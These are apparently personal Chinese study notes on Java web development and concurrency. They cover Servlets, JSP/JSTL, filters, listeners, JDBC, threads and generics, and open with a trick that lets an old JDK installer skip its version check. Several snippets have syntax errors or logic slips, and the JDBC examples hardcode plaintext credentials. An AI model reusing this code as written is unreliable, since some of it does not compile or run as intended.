因为学习当中需要用到低版本的Jdk，我下载了一个jdk7u67版本，当我兴致勃勃的双击下去之后，却遭遇到这样的一个错误

• 解决方法

安装包pkg解压以后修改里面的判断版本的代码，然后在打包安装就可以了。

操作步骤

• 将安装包JDK 7 Update 67.pkg解压成unpkg包

╰─➤  pkgutil --expand JDK 7 Update 67.pkg /tmp/jdk.unpkg

• 进入jdk.unpkg，里面有个Distribution的文件，输入vim Distribution编辑此文件

• 编辑文件，修改验证逻辑

function pm_install_check() {
  return true;
}

• 修改完如图

• 再次打包成pkg

pkgutil --flatten /tmp/jdk.unpkg /tmp/jdk.pkg

• 安装低版本Jdk

Servlet

实现了Servlet接口的java程序叫做Servlet

• 引入Servlet包

<dependencies>
        <dependency>
            <groupId>javax.servlet</groupId>
            <artifactId>javax.servlet-api</artifactId>
            <version>3.1.0</version>
        </dependency>

        <dependency>
            <groupId>javax.servlet.jsp</groupId>
            <artifactId>jsp-api</artifactId>
            <version>2.2</version>
        </dependency>
    </dependencies>

• 新建moudle修改web.xml头信息

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
          http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">
</web-app>

helloServlet

编写代码

import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;

public class helloservlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        PrintWriter writer = resp.getWriter ();
        writer.print ("hello,y4er");

    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }


}

• 编写Servlet映射（web.xml中）

  <servlet>
    <servlet-name>hello</servlet-name>
    <servlet-class>helloservlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>hello</servlet-name>
    <url-pattern>/hello</url-pattern>
  </servlet-mapping>

• 运行测试

ServletContext

this.getInitParameter() 初始化参数
this.getServletConfig() Servlet配置
this.getServletContext() Servlet上下文

共享数据

• helloservlet

import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;

public class helloservlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        ServletContext servletContext = this.getServletContext ();

        String user = "syst1m";

        servletContext.setAttribute ("username",user);
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }


}

• replyservlet

import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;

public class replyservlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        ServletContext servletContext = this.getServletContext ();
        String username = (String) servletContext.getAttribute ("username");

        resp.setContentType ("text/html");
        resp.setCharacterEncoding ("utf-8");
        resp.getWriter ().print ("名字为"+username);
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet (req, resp);
    }
}

• 注册Servlet

 <servlet>
    <servlet-name>hello</servlet-name>
    <servlet-class>helloservlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>hello</servlet-name>
    <url-pattern>/hello</url-pattern>
  </servlet-mapping>
  <servlet>
    <servlet-name>reply</servlet-name>
    <servlet-class>replyservlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>reply</servlet-name>
    <url-pattern>/reply</url-pattern>
  </servlet-mapping>

• 运行测试

获得初始化参数

• 注册Servlet

  <context-param>
    <param-name>jdbc</param-name>
    <param-value>jdbc:mysql://localhost:3306/mybatis</param-value>
  </context-param>

 <servlet>
    <servlet-name>jdbc</servlet-name>
    <servlet-class>jdbcServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>jdbc</servlet-name>
    <url-pattern>/jdbc</url-pattern>
  </servlet-mapping>

• 代码

import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;

public class jdbcServlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        ServletContext servletContext = this.getServletContext ();
        String url = servletContext.getInitParameter ("jdbc");
        resp.getWriter ().print (url);
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        super.doPost (req, resp);
    }
}

• 运行测试

转发

• code

public class forward extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        ServletContext servletContext = this.getServletContext ();
        servletContext.getRequestDispatcher ("/jdbc").forward (req,resp);
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        super.doPost (req, resp);
    }
}

读取资源文件

• db.properties

username=syst1m
password=123456

• code

import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.InputStream;
import java.util.Properties;

public class jdbcServlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {

        InputStream is = this.getServletContext ().getResourceAsStream ("WEB-INF/classes/db.properties");

        Properties prop = new Properties ();
        prop.load (is);
        String username = prop.getProperty ("username");
        String password = prop.getProperty ("password");

        resp.getWriter ().print (username+password);

    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        super.doPost (req, resp);
    }
}

• 运行测试

HttpServletResponse

Response下载文件

• code

public class FileServlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        //获取下载文件的路径
        String realPath = "/Users/syst1m/code/chabugservlet/com.web.servlet/src/main/resources/1.png";
        String FileName = realPath.substring (realPath.lastIndexOf ("\")+1);
        resp.setHeader ("Content-Disposition","attachment;filename="+ URLEncoder.encode (FileName,"UTF-8"));
        FileInputStream in = new FileInputStream (realPath);
        int len = 0;
        byte[] buffer = new byte[1024];
        ServletOutputStream out = resp.getOutputStream ();
        while((len=in.read(buffer))>0){
            out.write (buffer,0,len);
        }

        in.close();
        out.close ();
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }
}

• 注册Servlet

</servlet-mapping>
  <servlet>
    <servlet-name>down</servlet-name>
    <servlet-class>FileServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>down</servlet-name>
    <url-pattern>/down</url-pattern>
  </servlet-mapping>

• 运行测试

Response实现验证码

• code

public class captchaServlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {

        //浏览器每三秒刷新一次
        resp.setHeader ("refresh","3");
        //内存中创建一张图片
        BufferedImage image = new BufferedImage (80,20,BufferedImage.TYPE_3BYTE_BGR);
        //得到图片
        Graphics2D g = (Graphics2D)image.getGraphics ();
        //设置图片背景色
        g.setColor (Color.white);
        g.fillRect (0,0,80,80);
        //给图片写数据
        g.setColor (Color.blue);
        g.setFont (new Font (null,Font.BOLD,20));
        g.drawString (makenum(),1,20);
        //浏览器：以图片类型打开
        resp.setContentType ("image/jpeg");
        //清除缓存，不让浏览器缓存
        resp.setDateHeader ("expires",-1);
        resp.setHeader ("Cache-Control","no-cache");
        resp.setHeader ("Pragme","no-cache");
        // 把图片写给浏览器
        ImageIO.write (image,"jpg",resp.getOutputStream ());

    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }
    //生成随机数

    private String makenum(){
        Random random = new Random ();
        String num = random.nextInt (9999)+"";
        StringBuffer sb = new StringBuffer ();

        for (int i = 0; i < 7-num.length (); i++) {
            sb.append ("0");
        }
        num = sb.toString ()+num;
        return num;
    }
}

• 注册Servlet

<servlet>
    <servlet-name>img</servlet-name>
    <servlet-class>captchaServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>img</servlet-name>
    <url-pattern>/img</url-pattern>
  </servlet-mapping>

• 运行测试

Response实现重定向

resp.sendRedirect

HttpServletRequest

• 注册Servlet

 <servlet>
    <servlet-name>LoginServlet</servlet-name>
    <servlet-class>LoginServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>LoginServlet</servlet-name>
    <url-pattern>/login</url-pattern>
  </servlet-mapping>

• index.jsp

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>登陆</title>
</head>
<body>
<h1>登陆</h1>
    <div>
        <form action="${pageContext.request.contextPath}/login" method="post">

            用户名：<input type="text" name="username"><br>
            密码：<input type="password" name="password"><br>
            爱好：
            <input type="checkbox" name="hobbys" value="女孩">女孩
            <input type="checkbox" name="hobbys" value="代码">代码
            <input type="checkbox" name="hobbys" value="chabug">chabug
            <input type="checkbox" name="hobbys" value="渗透测试">渗透测试

            <br>
            <button type="submit">submit</button>
        </form>
    </div>
</body>
</html>  

• success.jsp

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>登陆成功</title>
</head>
<body>
<h1>登陆成功</h1>
</body>
</html>

• LoginServlet

public class LoginServlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
       req.setCharacterEncoding ("UTF-8");
       resp.setCharacterEncoding ("UTF-8");
       String username = req.getParameter ("username");
       String password = req.getParameter ("password");
       String[] hobbys = req.getParameterValues ("hobbys");

       System.out.println (username);
       System.out.println (password);
       System.out.println (Arrays.toString (hobbys));
       req.getRequestDispatcher ("/success.jsp").forward (req,resp);


    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }
}

• 运行测试

Cookie

• 注册Servlet

  <servlet>
    <servlet-name>cookie</servlet-name>
    <servlet-class>CookieServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>cookie</servlet-name>
    <url-pattern>/cookie</url-pattern>
  </servlet-mapping>
</web-app>

• code

public class CookieServlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {

        //解决乱码

        req.setCharacterEncoding ("UTF-8");
        resp.setCharacterEncoding ("UTF-8");
        PrintWriter out = resp.getWriter ();
        Cookie[] cookies = req.getCookies ();

        if(cookies!=null){
            out.write ("你上一次的时间是");
            for (int i = 0; i < cookies.length; i++) {
                Cookie cookie = cookies[i];
                if(cookie.getName ().equals ("lastlogintime")){
                    long logintime = Long.parseLong (cookie.getValue ());
                    Date date = new Date (logintime);
                    out.write (date.toLocaleString ());
                }
            }
        }else {
            out.write ("这是你第一次访问本站点");
        }
        Cookie cookie = new Cookie ("lastlogintime",System.currentTimeMillis ()+"");
        cookie.setMaxAge (***);
        resp.addCookie (cookie);
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }
}

• 运行测试

Session

• 设置，读取，删除

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        //获取Sesseion对象
        HttpSession session=request.getSession();
        session.setAttribute("username", "zhangsan");//存储数据
        session.getAttribute("username");//获取数据
        session.removeAttribute("username");//删除数据
    }

• Session的销毁

session.invalidate()

JSP

• jsp原理

内置对象

final javax.servlet.jsp.PageContext pageContext; 页面上下文
javax.servlet.http.HttpSession session1 = null; session
final javax.servlet.ServletContext application; applicationContext
final javax.servlet.ServletConfig config; config
javax.servlet.jsp.JspWriter out = null; out 
final java.lang.Object page = this; page 当前
HttpServletRequest request  请求
HttpServletResponse response 响应

• maven依赖

JSTL表达式依赖

<dependency>
    <groupId>javax.servlet.jsp.jstl</groupId>
    <artifactId>jstl-api</artifactId>
    <version>1.2</version>
</dependency>

standard标签库

<dependency>
    <groupId>taglibs</groupId>
    <artifactId>standard</artifactId>
    <version>1.1.2</version>
</dependency>

JSP基础语法和指令

• Tomcat热部署

https://blog.csdn.net/jc0803kevin/article/details/88579109

• Jsp表达式

<%--jsp表达式，用来将程序的输出，输出到客户端--%>
<%--<%= 变量或表达式%>--%>
<%= new java.util.Date()%>

• jsp脚本片段

<%

    int sum = 0;
    for (int i = 0; i < 100; i++) {
        sum+=1;
    }

    out.println ("<h1>sum="+sum+"</h1>");
%>

• jso声明

<%!

    static {
        System.out.println ("Loading Servlet");
    }

    private int globalVar = 0;

    public void test(){
        System.out.println ("进入了方法test");
    }
%>

jsp声明会被编译到JSP生成的java的类中，其他的会被生成到_jspServlet方法中

JSP指令

• 定制错误页面

<%@page args...%>

<%@page errorPage="err/err.html" %>

• 文件包含

<%@include file="index.jsp"%>
<jsp:include page="index.jsp">

JSP内置对象及作用域

• 9大内置对象

PageContext  存东西
Request  存东西
Response
Session
Application  [ServletContext] 存东西
config  [ServletConfig]
out
page
exception

• code

 pageContext.setAttribute("name1","syst1m1");  //一个页面中有效
 request.setAttribute("name2","syst1m2"); //一个请求中有效
 session.setAttribute("name3"."syst1m3"); //一个会话中有效
 application.setAttribute("name4"."syst1m4"); //保存的数据在服务器中中有效

• 通过寻找的方式获取

pageContext.findAttribute();

• 重定向

pageContext.forward()

Jsp、JSTL标签、EL表达式

EL表达式

• el表达式 ${}

获取数据

${标识符}

执行运算
获取web开发的常用对象

jsp标签

<jsp:forward page="test.jsp">
    <jsp:param name="paramtest" value="test"/>
</jsp:forward>

JSTL表达式

核心标签

• 引入JSTL核心标签库

<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %>

• set标签：将值保存在指定的作用域中

<%-- var="变量名"  value="值" scope="保存在哪个作用域（page、request、session、application）"--%>
<c:set var="userName" value="yzq" scope="page"></c:set>
<span>${userName}</span><%--配合EL表达式取值--%>

• out标签：将结果输出

<%--取值--%>
<c:out value="${userName}"></c:out>

• if标签：判断

<c:if test="${age>20}">

    <span>奔三的人了</span>

</c:if>

• choose：选择，跟java中的switch语句类似

<c:set var="age" scope="page" value="40"></c:set>
<c:choose>

    <%--符合该条件时执行--%>
    <c:when test="${age>20&&age<30}">
        <span>奔三的人了</span>
    </c:when>

    <%--符合该条件时执行--%>
    <c:when test="${age<20}">
        <span>还是小鲜肉</span>

    </c:when>

    <%--之前条件都不满足时，执行这个--%>
    <c:otherwise>

        <span>可以考虑养生了</span>

    </c:otherwise>
</c:choose>

• forEach标签：用于迭代集合

<%--迭代标签 用于迭代集合--%>
<c:forEach items="${users}" var="user">

    <span>${user.name}</span>:<span>${user.age}</span>
    <br>

</c:forEach>

JavaBean

一般用来与数据库的字段做映射

code

• javabean.java

package com.bean.pojo;

public class People {

    private int id;
    private String name;
    private int age;
    private String address;

    public People() {
    }

    public People(int id, String name, int age, String address) {
        this.id = id;
        this.name = name;
        this.age = age;
        this.address = address;
    }

    public int getId() {
        return id;
    }

    public void setId(int id) {
        this.id = id;
    }

    public String getName() {
        return name;
    }

    public void setName(String name) {
        this.name = name;
    }

    public int getAge() {
        return age;
    }

    public void setAge(int age) {
        this.age = age;
    }

    public String getAddress() {
        return address;
    }

    public void setAddress(String address) {
        this.address = address;
    }

    @Override
    public String toString() {
        return "People{" +
                "id=" + id +
                ", name='" + name + ''' +
                ", age=" + age +
                ", address='" + address + ''' +
                '}';
    }
}

• javabean.jsp

<jsp:useBean id="people" class="com.javabean.pojo.People" scope="page"/>
<jsp:setProperty name="people" property="address" value="北京"></jsp:setProperty>
<jsp:getProperty name="people" property="address"/>

过滤器Filter

• 编写Servlet

public class helloservlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
         resp.getWriter ().write ("你好呀，世界");
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }
}

• 编写Filter

public class encodeing implements Filter {
    public void init(FilterConfig filterConfig) throws ServletException {
    }

    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        servletRequest.setCharacterEncoding ("utf-8");
        servletResponse.setCharacterEncoding ("utf-8");
        servletResponse.setContentType ("text/html;charset=UTF-8");
        System.out.println ("过滤器执行前");
        filterChain.doFilter (servletRequest,servletResponse);
        System.out.println ("过滤器执行后");
    }

    public void destroy() {

    }
}

• 注册Filter

<filter>
    <filter-name>encode</filter-name>
    <filter-class>encodeing</filter-class>
  </filter>
  <filter-mapping>
    <filter-name>encode</filter-name>
    <url-pattern>/*</url-pattern>
  </filter-mapping>

• 测试

监听器

统计在线人数Demo

• index.jsp

<html>
<body>
<h2>Hello World!</h2>


<h1>当前有<span><%=this.getServletConfig().getServletContext().getAttribute("OnlineCount")%></span></h1>
</body>
</html>

• OnlineCount

@Override
    public void sessionCreated(HttpSessionEvent httpSessionEvent) {
        ServletContext ctx = httpSessionEvent.getSession ().getServletContext ();
        Integer onlineCount = (Integer)ctx.getAttribute ("OnlineCount");

        if(onlineCount==null){
            onlineCount=new Integer (1);
        }else {
            int count= onlineCount.intValue ();
            onlineCount = new Integer (count+1);
        }
        ctx.setAttribute ("OnlineCount",onlineCount);
    }

    //销毁session监听
    @Override
    public void sessionDestroyed(HttpSessionEvent httpSessionEvent) {
        ServletContext ctx = httpSessionEvent.getSession ().getServletContext ();
        Integer onlineCount = (Integer)ctx.getAttribute ("OnlineCount");

        if(onlineCount==null){
            onlineCount=new Integer (0);
        }else {
            int count= onlineCount.intValue ();
            onlineCount = new Integer (count-1);
            httpSessionEvent.getSession ().invalidate ();
        }
        ctx.setAttribute ("OnlineCount",onlineCount);
    }

• 注册监听器

<listener>
    <listener-class>OnlineCount</listener-class>
</listener>

• 测试

JDBC(Java fatabase connect)

JDBC

package com.jdbc4;

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.sql.Timestamp;
import java.util.Date;

public class TestUpdate {

  /**
   * @param args
   */
  public static void main(String[] args) {
    Connection conn=null;
    try {
      Class.forName("com.mysql.jdbc.Driver");
      //建立连接  ctrl+shfit +o
      conn=DriverManager.getConnection("jdbc:mysql://localhost/test?useUnicode=true&characterEncoding=utf-8", "root", "19810109");
      String sql="update book set title=?,price=?,birth=?,publish_date=?,update_date=? where id=?";
      //预编译
      PreparedStatement pstmt=conn.prepareStatement(sql);
      pstmt.setString(1, "四集");
      pstmt.setFloat(2, 50.55f);
      pstmt.setDate(3, new java.sql.Date(new Date().getTime()));
      pstmt.setTimestamp(4, new Timestamp(new Date().getTime()));
      pstmt.setTimestamp(5, new Timestamp(new Date().getTime()));
      pstmt.setInt(6, 1);

      //执行
      pstmt.executeUpdate();
    } catch (Exception e) {
      e.printStackTrace();
    }
    finally
    {
      try {
        conn.close();
      } catch (SQLException e) {
        e.printStackTrace();
      }
    }
  }

}

JDBC事务

connection.setAutoCommit(false) 开启事务

• 继承Thread类

public class Threadtest extends Thread {

    /**
     *
     * 多线程学习
     * **/
    @Override
    public void run(){
        for (int i = 0; i < 2000; i++) {
            System.out.println("我在看代码--");
        }
    }
    public static void main(String[] args) {

        Threadtest test = new Threadtest();

        test.start();
        for (int i = 0; i < 2000; i++) {
            System.out.println("我在学习多线程--");
        }
    }

• 实现Runnable接口

public class Threadtest implements Runnable {

    /**
     *
     * 多线程学习
     * **/
    @Override
    public void run(){
        for (int i = 0; i < 2000; i++) {
            System.out.println("我在看代码--");
        }
    }
    public static void main(String[] args) {

        Threadtest test = new Threadtest();

        new Thread(test).start();

        for (int i = 0; i < 2000; i++) {
            System.out.println("我在学习多线程--");
        }
    }


}

• 龟兔赛跑

public class Threadtest implements Runnable {

    /**
     *
     * 龟兔赛跑
     * **/

    private static String winner;

    @Override
    public void run(){
        for (int i = 0; i <= 100; i++) {
            if(Thread.currentThread().getName().equals("兔子")&& 1%10 ==0){
                try{
                    Thread.sleep(10);
                }catch (InterruptedException e){
                    e.printStackTrace();
                }
            }

            boolean flag = gameover(i);

            if ((flag)) {
                break;
            }

            System.out.println(Thread.currentThread().getName()+"跑了"+i+"步");
        }
    }

    private boolean gameover(int steps){
        if(winner!=null){
            return true;
        }{
            if(steps>=100){
                winner = Thread.currentThread().getName();
                System.out.println("winner is"+winner);
            }
        }

        return false;
    }
    public static void main(String[] args) {

        Threadtest test = new Threadtest();
        new Thread(test,"兔子").start();
        new Thread(test,"乌龟").start();
    }


}

• 线程停止（建议使用标志位）

public class Threadtest implements Runnable {

    /**
     *
     * 龟兔赛跑
     * **/

    private boolean flag = true;

    @Override
    public void run(){
        int i =0;
        while (flag){
            System.out.println("run...Thread"+i++);
        }
    }

    public void stop(){
        this.flag = false;
    }


    public static void main(String[] args) {
        Threadtest test = new Threadtest();
        new Thread(test).start();

        for (int i = 0; i < 1000; i++) {
            System.out.println("main"+i);

            if(i==900) {
                test.stop();
                System.out.println("子线程停止");
            }
        }
    }

}

• 线程休眠

Thread.sleep(1000)

• 线程礼让（yield）

public class Threadtest implements Runnable {


    private boolean flag = true;

    @Override
    public void run(){
        System.out.println(Thread.currentThread().getName()+"线程开始执行");
        Thread.yield();
        System.out.println(Thread.currentThread().getName()+"线程停止执行");
    }

    public static void main(String[] args) {
        Threadtest test = new Threadtest();

        new Thread(test,"a").start();
        new Thread(test,"b").start();
    }

}

• 线程强制执行(join)

public class Threadtest implements Runnable {


    @Override
    public void run(){
        for (int i = 0; i < 1000; i++) {
            System.out.println("线程vipl来了"+i);
        }
    }

    public static void main(String[] args) throws InterruptedException{

        Threadtest test = new Threadtest();
        Thread thread = new Thread(test);
        thread.start();

        for (int q = 0; q < 500; q++) {
            if(q==200){
                thread.join();
            }
            System.out.println("main"+q);
        }
    }

}

• 线程优先级

优先级只是意味着获得调度的概率低，并不是优先级低就不会被调用，顺序也是概率高，顺序可能也是不同的，全看CPU的调度

public class Threadtest {


    public static void main(String[] args) throws InterruptedException{

        //主线程默认优先级
        System.out.println(Thread.currentThread().getName()+"---->"+Thread.currentThread().getPriority());

        MyPriority MyPriority = new MyPriority();

        Thread t1= new Thread(MyPriority);
        Thread t2= new Thread(MyPriority);
        Thread t3= new Thread(MyPriority);

        //设置优先级

        t1.start();
        t2.setPriority(6);
        t2.start();
        t3.setPriority(Thread.MAX_PRIORITY);
        t3.start();
    }

}

class MyPriority implements Runnable{

    @Override
    public void run(){
        System.out.println(Thread.currentThread().getName()+"---->"+Thread.currentThread().getPriority());
    }
}

• 守护线程

public class TestDaemon {

    /**
     * 测试守护线程
     * **/

    public static void main(String[] args) throws InterruptedException{

        god god = new god();
        Y4er Y4er = new Y4er();

         Thread thread = new Thread(god);
        thread.setDaemon(true);
        thread.start();

        new Thread(Y4er).start();

    }

}


class god implements Runnable{

    @Override
    public void run(){
        while (true){
            System.out.println("上帝保佑着你");
        }
    }
}
class Y4er implements Runnable{

    @Override
    public void run(){
        for (int i = 0; i < 36500; i++) {
            System.out.println("开心的活着");
        }

        System.out.println("Googbyg world");
    }
}

• 线程同步

锁机制

synchronized(放置于资源竞争处)

同步方法

private synchronized void buy(){xx}

同步块

synchronized(Obj){}

• 死锁

public class DeadLock {

    public static void main(String[] args) {

        Makeup g1= new Makeup(0,"灰姑娘");
        Makeup g2= new Makeup(1,"白雪公主");
        g1.start();
        g2.start();
    }
}

//口红
class LipStick{}

//镜子

class Mirror{}

class Makeup extends Thread{

    static LipStick lipStick = new LipStick();
    static Mirror mirror = new Mirror();

    int choice;
    String girlName;

    Makeup(int choice,String girlName){
        this.choice = choice;
        this.girlName = girlName;
    }

    @Override
    public void run() {
        try {
            makeup();
        }catch (InterruptedException e){
            e.printStackTrace();
        }
    }

    private void makeup() throws InterruptedException{
        if(choice==0){
            synchronized (lipStick){
                System.out.println(this.girlName+"获得口红的🔒");
                Thread.sleep(1000);
                synchronized(mirror){
                    System.out.println(this.girlName+"获得镜子的🔒");
                }

            }
        }else {
            synchronized (mirror){
                System.out.println(this.girlName+"获得口红的🔒");
                Thread.sleep(1000);
                synchronized(lipStick){
                    System.out.println(this.girlName+"获得镜子的🔒");
                }

            }
        }
    }
}

• Lock锁

import java.util.concurrent.locks.ReentrantLock;

public class TestLock {

    public static void main(String[] args) {
        TestLock2 test = new TestLock2();
        new Thread(test).start();
        new Thread(test).start();
        new Thread(test).start();

    }
}


class TestLock2 implements Runnable{


    int ticketNums = 10;

    private final ReentrantLock lock = new ReentrantLock();

    @Override
    public void run() {
        while(true){
            try{
                lock.lock();

                if(ticketNums>0){
                    try{
                        Thread.sleep(1000);
                    }catch (InterruptedException e){
                        e.printStackTrace();
                    }
                    System.out.println(ticketNums--);
                }else {
                    break;
                }
            }finally {
                lock.unlock();
            }
        }
    }
}

线程协作（生产者与消费者问题）

管程法

/**
 *
 *测试生产者消费者模型-》利用缓冲区解决：管程法
**/

//生产者，消费者，产品，缓冲区
public class TestPC {

    public static void main(String[] args) {
        SynContainer container = new SynContainer();

        new Productor(container).start();
        new Consumer(container).start();
    }
}


//生产者

class Productor extends Thread{

    SynContainer container;
    public Productor(SynContainer container){
        this.container = container;
    }

    //生产


    @Override
    public void run() {
        for (int i = 0; i < 100; i++) {
            System.out.println("生产了"+i+"只鸡");
            container.push(new Chicken(i));
        }
    }
}


//消费者
class Consumer extends Thread{
    SynContainer container;

    public Consumer(SynContainer container){
        this.container = container;
    }

    //消费


    @Override
    public void run() {
        for (int i = 0; i < 100; i++) {
            System.out.println("消费了第"+container.pop().id+"只鸡");
        }
    }
}

//产品

class Chicken{
    int id; //产品编号

    public Chicken(int id) {
        this.id = id;
    }
}

//缓冲区

class SynContainer{

    //需要一个容器大小

    Chicken[] chickens = new Chicken[10];

    //容器计数器

    int count = 0;
    //生产者放入产品

    public synchronized void push(Chicken chicken){

        //如果容器满了，就需要等待消费者消费
        if(count==chickens.length){
            //通知消费者消费，生产等待

            try{
                this.wait();
            }catch (InterruptedException e ){
                e.printStackTrace();
            }
        }
        //荣国没有满，就需要丢入产品
        chickens[count]=chicken;
        count++;

        //可以通知消费者消费了

        this.notifyAll();
    }

    //消费者消费产品

    public synchronized Chicken pop(){
        //判断能否消费

        if(count==0){
            //等待生产者生产，消费者等待
            try{
                this.wait();
            }catch (InterruptedException e){
                e.printStackTrace();
            }

        }

        //如果可以消费
        count--;
        Chicken chicken = chickens[count];

        //吃完了，通知生产者生产
        this.notifyAll();
        return chicken;
    }

}

信号灯法(设置标志位)

public class TestPc2 {

    public static void main(String[] args) {

        TV tv = new TV();

        new Player(tv).start();
        new Watcher(tv).start();
    }
}


//生产者-〉演员

class Player extends Thread{
    TV tv;
    public Player(TV tv){
        this.tv = tv;
    }

    @Override
    public void run() {
        for (int i = 0; i < 20; i++) {
            if(i%2==0){
                this.tv.play("快乐大本营");
            }else {
                this.tv.play("抖音，记录美好生活");

            }        }
    }
}

//消费者-〉观看

class Watcher extends Thread{
    TV tv;
    public Watcher(TV tv){
        this.tv = tv;
    }

    @Override
    public void run() {
        for (int i = 0; i < 20; i++) {
            tv.watch();
        }
    }
}

//产品->节目

class TV{
    //演员表演，观众等待
    //观众观看，演员等待

    String voice;
    boolean flag = true;

    //表演

    public synchronized void play(String voice){

        if(!flag){
            try{
                this.wait();
            }catch (InterruptedException e){
                e.printStackTrace();

            }
        }        System.out.println("演员表演了:"+voice);

        this.notifyAll();
        this.voice = voice;
        this.flag = !this.flag;
    }

    //观看


    public synchronized void watch(){

        if(flag){
            try{
                this.wait();
            }catch (InterruptedException e){
                e.printStackTrace();
            }
        }

        System.out.println("观看了"+voice);

        //通知演员表演

        this.notifyAll();
        this.flag = !this.flag;

    }
}

线程池

import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;

/**
 * 测试线程池
 * **/
public class TestPool {
    public static void main(String[] args) {
        ExecutorService service = Executors.newFixedThreadPool(10);

        service.execute(new MyThread());
        service.execute(new MyThread());
        service.execute(new MyThread());
        service.execute(new MyThread());

    }

}


class MyThread implements Runnable{

    @Override
    public void run() {
        for (int i = 0; i < 100; i++) {
            System.out.println(Thread.currentThread().getName()+i);
        }
    }
}

• 泛型，参数化类型，分为泛型类、接口、方法

泛型类

class 类名称 <泛型标识> {
    private 泛型标识 var;
    ...
}

泛型接口

public class chabug {
    public static void main(String[] args) {
        new testa().next();
    }

}

interface test<T>{
    public T next();
}

class testa implements test<String>{
    private String[] b  = new String[]{"a","b","c","d"};
    @Override
    public String next(){
        Random rand = new Random();
        System.out.println(b[rand.nextInt(3)]);
        return null;
    }
}

泛型方法

public class chabug {
    public static void main(String[] args) {
        out("28");
        out("永远滴神");
    }

    public static <T> void out(T t) {
        System.out.println(t);
    }
}

泛型通配符

public void showKeyValue1(Generic<?> obj){
    Log.d("泛型测试","key value is " + obj.getKey());
}

泛型上下边界

• 在使用泛型的时候，我们还可以为传入的泛型类型实参进行上下边界的限制，如：类型实参只准传入某种类型的父类或某种类型的子类。为泛型添加上边界，即传入的类型实参必须是指定类型的子类型,泛型的上下边界添加，必须与泛型的声明在一起.

• 常规例子（会提示类型无法转换）

• 使用上下边界

• 疑惑

GenericHolder<Fruit> fruitHolder = new GenericHolder<Fruit>()

为何意思

解决：
